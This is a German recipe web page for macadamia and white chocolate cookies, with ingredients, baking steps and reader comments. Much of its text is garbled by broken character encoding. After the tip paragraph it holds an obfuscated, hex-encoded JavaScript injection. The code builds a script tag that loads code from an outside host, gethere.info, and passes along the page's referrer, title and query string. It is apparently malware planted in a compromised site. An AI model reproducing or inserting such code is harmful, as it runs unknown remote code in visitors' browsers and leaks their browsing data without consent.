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Macadamia Kekse

Ein sehr leckeres Keksrezept mit Macadamia NA?ssen und weiAYer Schokolade. Auch als PlA�tzchen geeignet, ein luftig leichtes GebA�ck.

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  • Zutaten:
  • 200 g weiAYe Schokolade
  • 200 g Macadamia NA?sse
  • 1 Vanilleschote
  • 150 g Butter
  • 80 g Zucker
  • 1 Prise Salz
  • 1 Ei
  • 200 g Dinkelmehl
  • 1 gestrichener Tl Backpulver

Zubereitung:

macadamia-kekse.jpg

Die weiAYe Schokolade und die Macadamia NA?sse grob hacken. Anschliessend das Mark der Vanilleschote mit Zucker vermischen und mit der Butter cremig schlagen.

Salz, Ei, und mit Backpulver vermischtes Mehl dazugeben. Die grob gehackte Schokolade und die NA?sse vorsichtig unterheben.

Mit einem TeelA�ffel kleine HA�ufchen auf dem Blech verteilen und fA?r 5 Minuten in den Ofen schieben (ca. 180-200 A�C). Die PlA�tzchen vor dem Naschen abkA?hlen lassen. Sie sind noch etwas weich und sehr heiAY!

Tipp: Mit Honig A?berzogene Macadamia NA?sse eignen sich auch sehr gut.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

von
Mitglied seit 2006

5 Kommentare zu Rezept – Macadamia Kekse

  1. Hallo Jenny,
    würde mich freuen, wenn du mir sagst wie sie Dir geschmeckt haben. Ich war völlig begeistert, aber bei Macadamia und weißer Schokolade kann man eh nichts falsch machen ;)

  2. Habe ich zum ersten mal probiert.Einfach lecker sind schnell gemacht aber leider noch schneller gegessen. Tolles rezept

  3. Liebe Jenny
    Du hast mir sehr geholfen, denn wir mussten in deutsch etwas Indisches machen. Und nun kann ich diese leckeren Kekse machen.
    Vielen, vielen Dank
    Mhhh…

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